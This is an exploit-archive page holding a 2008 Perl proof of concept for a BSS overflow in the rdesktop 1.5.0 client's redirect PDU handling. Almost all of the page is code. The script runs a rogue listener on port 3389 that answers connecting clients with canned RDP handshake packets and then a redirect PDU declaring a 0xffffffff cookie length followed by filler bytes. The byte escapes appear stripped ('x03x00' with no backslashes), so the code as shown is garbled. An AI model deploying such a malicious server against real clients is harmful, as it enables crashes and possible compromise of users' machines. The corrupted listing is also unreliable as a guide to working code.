rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC
# Published : 2008-05-11
# Author : Guido Landi
# Previous Title : PHP 5.2.6 sleep() Local Memory Exhaust Exploit
# Next Title : rdesktop 1.5.0 iso_recv_msg() Integer Underflow Vulnerability PoC

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697

use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

my $evil = 	"x03x00x01x47x02xf0x80x68x00x01x03xebx70x81x38" 	.
		"x01x00x10x00"						. 
		"xc5x32"							.
		"x04x75"							. # PDU TYPE == 0x4 == PDU_REDIRECT
		"xb7xdaxf8x43"						.
		"x01x00x00x00"						.
		"x01x00x00x00"						.
		"xffxffxffxff"						. # len of g_redirect_cookie
		"x41" x 64							; # g_redirect_cookie

while(my $c = $sock->accept())
{
	while(<$c>)
	{
		print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil;
	}
}




sub ONE()
{
	"x03x00x00x0bx06xd0x00x00x12x34x00"
}

sub TWO()
{
	"x03x00x01x49x02xf0x80x7fx66x82x01".
	"x3dx0ax01x00x02x01x00x30x1ax02x01".
	"x22x02x01x03x02x01x00x02x01x01x02".
	"x01x00x02x01x01x02x03x00xffxf8x02".
	"x01x02x04x82x01x17x00x05x00x14x7c".
	"x00x01x2ax14x76x0ax01x01x00x01xc0".
	"x00x4dx63x44x6ex81x00x01x0cx08x00".
	"x04x00x08x00x03x0cx0cx00xebx03x01".
	"x00xecx03x00x00x02x0cxecx00x02x00".
	"x00x00x02x00x00x00x20x00x00x00xb8".
	"x00x00x00x29x60xbbx2fxc4x4dx00x9e".
	"x58x8axb4x85x35x6ax71xeaxadxf9x3d".
	"x0ex5ex8ex87x64x2dx52x42xedxb2x91".
	"x3fxf9x01x00x00x00x01x00x00x00x01".
	"x00x00x00x06x00x5cx00x52x53x41x31".
	"x48x00x00x00x00x02x00x00x3fx00x00".
	"x00x01x00x01x00xf9xa3x35xb2x78x63".
	"x8dx94x65x47x22x54x49x55xaex6fx74".
	"x69x73x6exeex2bxa5xd0x47xf6xc0x89".
	"x2exa0x54xf5x12x87x75xb5x89xf7x83".
	"x48xd9x54xebxdex20x73xd6xd8xf3xee".
	"x0fxf7xc2xaaxa4x79x0ax5ax64x92x53".
	"xc4x75xd4x00x00x00x00x00x00x00x00".
	"x08x00x48x00xf6x20x04x62x5bx2fx04".
	"xaex02x04x4ax7excfx59x02x11xf7x7f".
	"xabx74x95xcex01x4exf6x14x50x0bxd7".
	"x54x8fxf0x92xd5x0cx6fx42xd8x21x98".
	"x9fx87x50x9ax33x6cxefx65x05x5cx4a".
	"x93x51xc1x69x59x7cx3dxf4x63xdcx53".
	"x66x3bx00x00x00x00x00x00x00x00"
}

sub THREE()
{
	"x03x00x00x0bx02xf0x80x2ex00x00x04"
}

sub FOUR()
{
	"x03x00x00x0fx02xf0x80x3ex00x00x04x03xedx03xed"
}

sub FIVE()
{
	"x03x00x00x0fx02xf0x80x3ex00x00x04x03xebx03xeb"
}

sub SIX()
{
	"x03x00x00x0fx02xf0x80x3ex00x00x04x03xecx03xec"
}

sub SEVEN()
{
	"x03x00x00x22x02xf0x80x68x00x01x03xebx70x14x80x02x10x00xffx03x10x00x07x00x00x00x02x00x00x00x30x9ax00x00"
}

# www.Syue.com [2008-05-11]